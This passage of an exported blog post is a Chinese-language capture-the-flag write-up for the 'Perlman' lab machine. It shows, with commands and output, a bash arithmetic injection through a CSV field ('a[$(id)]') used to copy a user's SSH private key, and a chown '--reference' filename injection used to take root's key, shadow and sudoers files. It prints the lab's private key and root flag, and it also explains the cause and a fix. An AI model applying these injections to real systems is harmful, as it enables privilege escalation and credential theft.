src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202407111746975.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240711171826286\" style=\"zoom:50%;\" \/><\/div><\/p>\n<h3>bash\u7279\u6027\u6267\u884c\u547d\u4ee4<\/h3>\n<pre><code class=\"language-bash\">milou@perlman:~$ sudo -l\nMatching Defaults entries for milou on perlman:\n    env_reset, mail_badpass, secure_path=\/usr\/local\/sbin\\:\/usr\/local\/bin\\:\/usr\/sbin\\:\/usr\/bin\\:\/sbin\\:\/bin\n\nUser milou may run the following commands on perlman:\n    (ze_perlman) NOPASSWD: \/bin\/bash \/home\/ze_perlman\/inventory\nmilou@perlman:~$ file \/home\/ze_perlman\/inventory\n\/home\/ze_perlman\/inventory: Bourne-Again shell script, ASCII text 
executable\nmilou@perlman:~$ cat \/home\/ze_perlman\/inventory\n#! \/bin\/bash\n\necho -e &quot;\\n+IT Inventory+\\n&quot;\ngreen=$(tput setaf 2)\nbold=$(tput bold)\nnormal=$(tput sgr0)\n\nwhile IFS=, read item brand price numb\ndo\n  subtotal=$((numb*price))\n  echo -e &quot;Item:\\t\\t ${bold}$item${normal}&quot; \n  echo -e &quot;Brand:\\t\\t $brand&quot;\n  echo -e &quot;Price\/Unit:\\t $price$&quot; \n  echo -e &quot;Quantity:\\t $numb pcs&quot;\n  echo -e &quot;Subtotal:\\t $subtotal$&quot;\n  echo &quot;&quot;\n\nfor x in ${subtotal[@]}\ndo\n((  total+=x ))\ndone\n\nsum=0\nfor i in &quot;${total[@]}&quot;\ndo\n  (( sum+=i ))\ndone\n\ndone &lt; &lt;(cat perl_store.csv |sed -n &#039;1!p&#039;)\n\necho -e &quot;\\nTotal cost: \\t ${bold}${green}$sum$&quot;\nmilou@perlman:~$ sudo -u ze_perlman \/bin\/bash \/home\/ze_perlman\/inventory\n\n+IT Inventory+\n\ncat: perl_store.csv: No such file or directory\n\nTotal cost:      $<\/code><\/pre>\n<p>脚本里 <code>cat perl_store.csv<\/code> 用的是相对路径，读的是执行 sudo 时所在的当前目录，所以在 ~ 下会报 No such file。先回到 ze_perlman 的家目录跑一遍看正常输出；顺便注意 ls 里 perl_store.csv 的权限是 <code>-rw-r--rw-<\/code>，other 可写，也就是说即使不换目录，milou 也能直接改掉这份 csv：<\/p>\n<pre><code class=\"language-bash\">milou@perlman:\/home\/ze_perlman$ ls -la\ntotal 36\ndrwxr-xr-x 4 ze_perlman ze_perlman 4096 Sep 11  2022 .\ndrwxr-xr-x 5 root       root       4096 Jul 23  2022 ..\nlrwxrwxrwx 1 root       root          9 Jul 23  2022 .bash_history -&gt; \/dev\/null\n-rw-r--r-- 1 ze_perlman ze_perlman 3526 Jul 26  2022 .bashrc\n-rwxr-xr-x 1 ze_perlman ze_perlman  557 Sep 11  2022 inventory\ndrwxr-xr-x 3 ze_perlman ze_perlman 4096 Jul 26  2022 .local\n-rw-r--rw- 1 ze_perlman ze_perlman  115 Sep 11  2022 perl_store.csv\n-rw-r--r-- 1 ze_perlman ze_perlman  807 Jul 26  2022 .profile\ndrwx------ 2 ze_perlman ze_perlman 4096 Sep 11  2022 .ssh\n-rwx------ 1 ze_perlman ze_perlman   33 Sep 11  2022 user.txt\nmilou@perlman:\/home\/ze_perlman$ cat perl_store.csv \nitem,brand,price,numb\nCPU,AMD,3,550\nGPU,Nvidia,4,1150\nSCREEN,Samsung,4,400\nMOUSE,Razer,6,20\nKEYBOARD,Logitech,95,7\nmilou@perlman:\/home\/ze_perlman$ sudo -u ze_perlman \/bin\/bash 
\/home\/ze_perlman\/inventory\n\n+IT Inventory+\n\nItem:            CPU\nBrand:           AMD\nPrice\/Unit:      3$\nQuantity:        550 pcs\nSubtotal:        1650$\n\nItem:            GPU\nBrand:           Nvidia\nPrice\/Unit:      4$\nQuantity:        1150 pcs\nSubtotal:        4600$\n\nItem:            SCREEN\nBrand:           Samsung\nPrice\/Unit:      4$\nQuantity:        400 pcs\nSubtotal:        1600$\n\nItem:            MOUSE\nBrand:           Razer\nPrice\/Unit:      6$\nQuantity:        20 pcs\nSubtotal:        120$\n\nItem:            KEYBOARD\nBrand:           Logitech\nPrice\/Unit:      95$\nQuantity:        7 pcs\nSubtotal:        665$\n\nTotal cost:      8635$<\/code><\/pre>\n<p>这说明 csv 的内容完全由调用者控制（相对路径加上 other 可写）。利用点在脚本第 10 行的 <code>subtotal=$((numb*price))<\/code>：bash 的算术展开 <code>$(( ))<\/code> 会把变量的值再当作算术表达式求值一次，值形如 <code>a[...]<\/code> 时会被当作数组下标解析，而下标里允许命令替换，于是 <code>$(id)<\/code> 就以 ze_perlman 的身份被执行了，这就是典型的 bash 算术展开注入。下面报错里的 error token 正是 <code>id<\/code> 的输出被回填进表达式后才报出来的，说明命令在报错之前已经执行完毕。修复思路是在做算术之前用 <code>[[ $numb =~ ^[0-9]+$ ]]<\/code> 这类正则校验输入，并用绝对路径读取一份只有属主可写的 csv。具体利用方案可以尝试看群主的视频，参考第一个，讲的非常细致！<\/p>\n<pre><code class=\"language-bash\">milou@perlman:\/tmp$ sudo -u ze_perlman \/bin\/bash \/home\/ze_perlman\/inventory\n\n+IT Inventory+\n\n\/home\/ze_perlman\/inventory: line 10: uid=1002(ze_perlman) gid=1002(ze_perlman) groups=1002(ze_perlman): syntax error in expression (error token is &quot;(ze_perlman) gid=1002(ze_perlman) groups=1002(ze_perlman)&quot;)\n\nTotal cost:      $\nmilou@perlman:\/tmp$ cat perl_store.csv \nitem,brand,price,numb\nCPU,AMD,3,a[$(id)]<\/code><\/pre>\n<pre><code class=\"language-bash\">milou@perlman:\/tmp$ nano perl_store.csv\nmilou@perlman:\/tmp$ cat perl_store.csv \nitem,brand,price,numb\nCPU,AMD,3,a[$(id),$(cat 
\/home\/ze_perlman\/.ssh\/id_rsa &gt; \/tmp\/flag.txt)]\nmilou@perlman:\/tmp$ sudo -u ze_perlman \/bin\/bash \/home\/ze_perlman\/inventory\n\n+IT Inventory+\n\n\/home\/ze_perlman\/inventory: line 10: uid=1002(ze_perlman) gid=1002(ze_perlman) groups=1002(ze_perlman),: syntax error in expression (error token is &quot;(ze_perlman) gid=1002(ze_perlman) groups=1002(ze_perlman),&quot;)\n\nTotal cost:      $\nmilou@perlman:\/tmp$ cat flag.txt\n-----BEGIN OPENSSH PRIVATE KEY-----\nb3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAABlwAAAAdzc2gtcn\nNhAAAAAwEAAQAAAYEA200PYB\/uIyQrbCV1qG1NUIz6KlWiFxoOmrAIQKdahaRX0MY28IhS\n7eW4241VG2cPvWturv1yaej9LxItknddx40TvYUZ\/GnLZaVJd1cwBD3WJmuN+wtNyqPf1Y\nOpI05FmI7Kpsh6R9G8Q4F7H6l2SfSiOK6c+Rs3nLsd7651fH7CvHiC4kci7A0FC3GLdbcH\nQR9A02YYalXDfexaeccGz\/1KTN+01\/A6PONeH\/kvmw+kIOUs9cCpxFsV7w7d\/MbsWOaA1h\nyxAtm6zCsz3TxzL6RHe7kf+31O7LcUaNMZ+yHvX+F7DjaDuNdnI8LBYDWgK7St2UbX3N7d\nrAILRVSKFaEd9BX73QF0BSABclWUjSyfb\/jLY2LbJsYB\/nUGE0rTRELIBaw4doH+WvNXhJ\ncdoB15pcsfWGi8fgK9uurQR\/vYciKjPmBIutUccyQ3sW1RKdP3YLT9EdKBrxgIsp0Ttpur\nNVAA5Gm9VspkhseJSm8TXHkBUQ48oLjXrbKvvuDxAAAFkFS8PG5UvDxuAAAAB3NzaC1yc2\nEAAAGBANtND2Af7iMkK2wldahtTVCM+ipVohcaDpqwCECnWoWkV9DGNvCIUu3luNuNVRtn\nD71rbq79cmno\/S8SLZJ3XceNE72FGfxpy2WlSXdXMAQ91iZrjfsLTcqj39WDqSNORZiOyq\nbIekfRvEOBex+pdkn0ojiunPkbN5y7He+udXx+wrx4guJHIuwNBQtxi3W3B0EfQNNmGGpV\nw33sWnnHBs\/9SkzftNfwOjzjXh\/5L5sPpCDlLPXAqcRbFe8O3fzG7FjmgNYcsQLZuswrM9\n08cy+kR3u5H\/t9Tuy3FGjTGfsh71\/hew42g7jXZyPCwWA1oCu0rdlG19ze3awCC0VUihWh\nHfQV+90BdAUgAXJVlI0sn2\/4y2Ni2ybGAf51BhNK00RCyAWsOHaB\/lrzV4SXHaAdeaXLH1\nhovH4Cvbrq0Ef72HIioz5gSLrVHHMkN7FtUSnT92C0\/RHSga8YCLKdE7abqzVQAORpvVbK\nZIbHiUpvE1x5AVEOPKC4162yr77g8QAAAAMBAAEAAAGBALIefvSGOreUMyidrFjmnjtkpf\nQopYS6B06g17Mbuqx9dU3\/ELSBJUpQobrBqnSdWu1xCu9ar8lSEgJfc2BZT3Q7I+N07kxT\n6X5fp7IkwL1RNFT0WteisMZ8H9ueGoywkFp+8B5TCu62bYEu88AdthQPfIspWBoEf0Dvwj\nrgqlA57RWDlFsRiE3NrWFEEg\/EX0IHjnGlpQMJMcVfaYUroF7izaxursYNOmAmFFdH3+DD\n7X1CZygcGkd\/6+rFWoxrTB9oAXszLleRQsDSZWAQsM6oCGprlwvWI+TAOSAwHG
R\/LvrhbM\n0XFMDiGBHhv22W\/O4\/CkLQskjKZKE7QWdC6e0Gw5\/QNImNWlv0uycqWedkBF9mIVE6ocUt\nJJQiAfE6ja92TU3pGBH5V5jQu5XIaJkBl96ZolXjqY6z6\/NeW6SAWiWv\/b6WNQOC3MeHfW\n0ZRjQubfIK69VEzfumWqStgzFZ8mS+a5PaxwlefS8u4dcGZECv\/EVOQ3+X623qMnQDIQAA\nAMBKPxKVsbkLh3PR64zwqN3dbEynemSZ3lZMKNeZtYaq8byYtzGjOxfOwSGzFSb\/Wpt1XH\n\/esihGXMIwwkar3vlSDVVLMTRtq+hw4g9zks0pyHlaTBeCK47nawU1jEG+3Jqqzzsmn8ig\nGxZIcv47XWqZz5fN1tQ5AGR3KOGw994UEQqjN+UEZ9FdU6WFiTeuHdDk3+dobkOeNfyJiO\n6ycICISJjaPGo6PIsfRcGr80hermZ0xZn58TjJJ+zWcdSR1V4AAADBAO63qzbUEru94TDb\nGSE2ea9WiZsUePxvhRDDWOP12HqHM6JMwXkL\/40jVpA6uVxUDDSUo7iCLQCIezBZCJP2xB\nbmmVMDRAKoDWCwGpFcyhS\/EZqUv2Ru654GaB1Bc5HCo6v1kHfRYp284NsVhbryk+lNTyLQ\nheJ8xTUPCuzy34GN+KP469MCK6YO\/1NdJf1deB5TUMq5cZzeNp3gqDR4fg\/wb4z1BLy0nR\nyaYILHC\/kNUDYUA2rV87pOrgC+emMiXQAAAMEA6y2IHAPT9yQwFmMv1eWrySa0QbbkTulk\nlI1o+EqlVM2eU5Jv7iiEMKwRLDpkm3p+GKL5wf2\/rYod07goJTO3DEcmJvSq+YiK1LofoR\nZVjqDNowP94PtAKwoPZOC1FrIFyFs8v0YBmz4NapamNnfPOKAWgQJsrbW4Mc\/gIYijb+ja\n4WFc7yIxALDWAIZ+oa\/bcU2aoKyiUcaeMHc0bMBtJI\/NSkMSTjWPKv4Nx7ZEZ6Xdn\/kQ6z\nMiiqfchnsvWvelAAAAFnplX3BlcmxtYW5AcGVybG1hbi5obXYBAgME\n-----END OPENSSH PRIVATE KEY-----<\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202407111746976.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202407111746976.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240711173347826\" style=\"zoom:33%;\" \/><\/div><\/p>\n<h3>\u63d0\u6743root<\/h3>\n<pre><code 
class=\"language-bash\">ze_perlman@perlman:~$ sudo -l\nMatching Defaults entries for ze_perlman on perlman:\n    env_reset, mail_badpass, secure_path=\/usr\/local\/sbin\\:\/usr\/local\/bin\\:\/usr\/sbin\\:\/usr\/bin\\:\/sbin\\:\/bin\n\nUser ze_perlman may run the following commands on perlman:\n    (root) NOPASSWD: \/bin\/bash \/opt\/backup\/bk *\nze_perlman@perlman:~$ cat \/opt\/backup\/bk\n#! \/bin\/bash\n\nvfy=$(&lt;\/opt\/vfy.txt)\n\nbackup(){\n\ncp \/etc\/{passwd,shadow,sudoers} \/opt\/backup\ncp ~\/.ssh\/id_rsa \/opt\/backup\nchmod 700 \/opt\/backup\/*\nchmod 700 \/root\nchown root:root \/usr\/lib\/news\/*\nchown root:root *\nchown -R news:news \/var\/lib\/news\nchown -R www-data:www-data \/var\/www\n}\n\n[[ $1 == &quot;${vfy\/un\/}&quot; ]] &amp;&amp; backup\nze_perlman@perlman:~$ cd \/opt\/backup\nze_perlman@perlman:\/opt\/backup$ cat \/opt\/vfy.txt\nundesired-root-2022\nze_perlman@perlman:\/opt\/backup$ sudo \/bin\/bash \/opt\/backup\/bk desired-root-2022\nchmod: changing permissions of &#039;\/opt\/backup\/bk&#039;: Operation not permitted\nchown: changing ownership of &#039;bk&#039;: Operation not permitted\nze_perlman@perlman:\/opt\/backup$ ls -la\ntotal 28\ndrwxrwx--- 2 root ze_perlman 4096 Jul 11 11:36 .\nd-wxr-x--- 3 root ze_perlman 4096 Sep 11  2022 ..\n-rwxr-xr-x 1 root root        318 Jul 23  2022 bk\n-rwx------ 1 root root       2602 Jul 11 11:36 id_rsa\n-rwx------ 1 root root       1800 Jul 11 11:36 passwd\n-rwx------ 1 root root       1224 Jul 11 11:36 shadow\n-rwx------ 1 root root        799 Jul 11 11:36 sudoers<\/code><\/pre>\n<p>\u8fd9\u91cc\u7528\u4e86chown\u7684\u4e00\u4e2a\u53c2\u6570\u4ece\u800c\u5229\u7528 *\u8fdb\u884c\u6267\u884c\u547d\u4ee4\uff01<\/p>\n<pre><code class=\"language-bash\">--reference=RFILE\nuse RFILE&#039;s owner and group rather than specifying OWNER:GROUP values.  
RFILE is always dereferenced.<\/code><\/pre>\n<p>\u4ee5\u4e00\u4e2a\u6587\u4ef6\u7684\u6743\u9650\u8fdb\u884c\u53c2\u8003\uff0c\u6539\u5176\u4ed6\u6587\u4ef6\u6743\u9650\uff0c\u76f8\u5f53\u4e8e\u6309\u7167\u8fd9\u4e2a\u6a21\u677f\u6539\u6743\u9650\u3002\u3002\u3002\u3002\u3002\u800c\u6587\u4ef6\u53c8\u662f\u4f20\u8fdb\u53bb\u6587\u4ef6\u540d\u6267\u884c\u7684\uff0c\u6240\u4ee5\u6211\u4eec\u7684\u6587\u4ef6\u540d\u5c31\u6210\u4e86\u914d\u7f6e\u9879\uff0c\u8fd9\u601d\u8def\u3002\u3002\u3002<\/p>\n<pre><code class=\"language-bash\">ze_perlman@perlman:\/opt\/backup$ ls -la\ntotal 28\ndrwxrwx--- 2 root ze_perlman 4096 Jul 11 11:36 .\nd-wxr-x--- 3 root ze_perlman 4096 Sep 11  2022 ..\n-rwxr-xr-x 1 root root        318 Jul 23  2022 bk\n-rwx------ 1 root root       2602 Jul 11 11:36 id_rsa\n-rwx------ 1 root root       1800 Jul 11 11:36 passwd\n-rwx------ 1 root root       1224 Jul 11 11:36 shadow\n-rwx------ 1 root root        799 Jul 11 11:36 sudoers\nze_perlman@perlman:\/opt\/backup$ touch whoami\nze_perlman@perlman:\/opt\/backup$ chmod 777 whoami\nze_perlman@perlman:\/opt\/backup$ touch -- &#039;--reference=whoami&#039;\nze_perlman@perlman:\/opt\/backup$ ls -la\ntotal 28\ndrwxrwx--- 2 root       ze_perlman 4096 Jul 11 11:41  .\nd-wxr-x--- 3 root       ze_perlman 4096 Sep 11  2022  ..\n-rwxr-xr-x 1 root       root        318 Jul 23  2022  bk\n-rwx------ 1 root       root       2602 Jul 11 11:36  id_rsa\n-rwx------ 1 root       root       1800 Jul 11 11:36  passwd\n-rw-r--r-- 1 ze_perlman ze_perlman    0 Jul 11 11:41 &#039;--reference=whoami&#039;\n-rwx------ 1 root       root       1224 Jul 11 11:36  shadow\n-rwx------ 1 root       root        799 Jul 11 11:36  sudoers\n-rwxrwxrwx 1 ze_perlman ze_perlman    0 Jul 11 11:41  whoami\nze_perlman@perlman:\/opt\/backup$ sudo \/bin\/bash \/opt\/backup\/bk desired-root-2022\nchmod: changing permissions of &#039;\/opt\/backup\/bk&#039;: Operation not permitted\nchown: cannot access &#039;root:root&#039;: No such file or 
directory\nchown: changing ownership of &#039;bk&#039;: Operation not permitted\nze_perlman@perlman:\/opt\/backup$ ls -la\ntotal 28\ndrwxrwx--- 2 root       ze_perlman 4096 Jul 11 11:41  .\nd-wxr-x--- 3 root       ze_perlman 4096 Sep 11  2022  ..\n-rwxr-xr-x 1 root       root        318 Jul 23  2022  bk\n-rwx------ 1 ze_perlman ze_perlman 2602 Jul 11 11:44  id_rsa\n-rwx------ 1 ze_perlman ze_perlman 1800 Jul 11 11:44  passwd\n-rwx------ 1 ze_perlman ze_perlman    0 Jul 11 11:41 &#039;--reference=whoami&#039;\n-rwx------ 1 ze_perlman ze_perlman 1224 Jul 11 11:44  shadow\n-rwx------ 1 ze_perlman ze_perlman  799 Jul 11 11:44  sudoers\n-rwx------ 1 ze_perlman ze_perlman    0 Jul 11 11:41  whoami\nze_perlman@perlman:\/opt\/backup$ ssh root@0.0.0.0 -i id_rsa\nThe authenticity of host &#039;0.0.0.0 (0.0.0.0)&#039; can&#039;t be established.\nECDSA key fingerprint is SHA256:BrnX5xrQQLBhNII4axkXA489ckv5pH78f5Bj4aBNpKg.\nAre you sure you want to continue connecting (yes\/no\/[fingerprint])? yes\nWarning: Permanently added &#039;0.0.0.0&#039; (ECDSA) to the list of known hosts.\nLinux perlman.hmv 5.10.0-18-amd64 #1 SMP Debian 5.10.140-1 (2022-09-02) x86_64\n\nThe programs included with the Debian GNU\/Linux system are free software;\nthe exact distribution terms for each program are described in the\nindividual files in \/usr\/share\/doc\/*\/copyright.\n\nDebian GNU\/Linux comes with ABSOLUTELY NO WARRANTY, to the extent\npermitted by applicable law.\nLast login: Sun Sep 11 12:59:15 2022 from 192.168.0.29\nroot@perlman:~# cat root.txt \n0ca2710be21eabe7ddbf0240557bd210\nroot@perlman:~# cat .local\/\n.clean_tmp  share\/      \nroot@perlman:~# cat .local\/.clean_tmp\n#! 
\/bin\/bash\n\nfind \/tmp\/* -user $USER -exec rm -rf {} \\; 2&gt;\/dev\/null\n\nrm -f \/var\/mail\/{milou,ze_perlman} 2&gt;\/dev\/null<\/code><\/pre>\n<h2>\u53c2\u8003<\/h2>\n<p><a href=\"https:\/\/www.bilibili.com\/video\/BV19H4y1p7nr\/\">https:\/\/www.bilibili.com\/video\/BV19H4y1p7nr\/<\/a><\/p>\n<p><a href=\"https:\/\/www.youtube.com\/watch?v=O5igRyR2Tis\">https:\/\/www.youtube.com\/watch?v=O5igRyR2Tis<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Perlman \u4fe1\u606f\u641c\u96c6 \u7aef\u53e3\u626b\u63cf \u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/perlman] \u2514\u2500$ r [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[11,18],"tags":[],"class_list":["post-754","post","type-post","status-publish","format-standard","hentry","category-ctf-and-protest","category-web"],"_links":{"self":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/754","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/comments?post=754"}],"version-history":[{"count":1,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/754\/revisions"}],"predecessor-version":[{"id":755,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/754\/revisions\/755"}],"wp:attachment":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/media?parent=754"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/categories?post=754"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/162.14.82.114\/
index.php\/wp-json\/wp\/v2\/tags?post=754"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}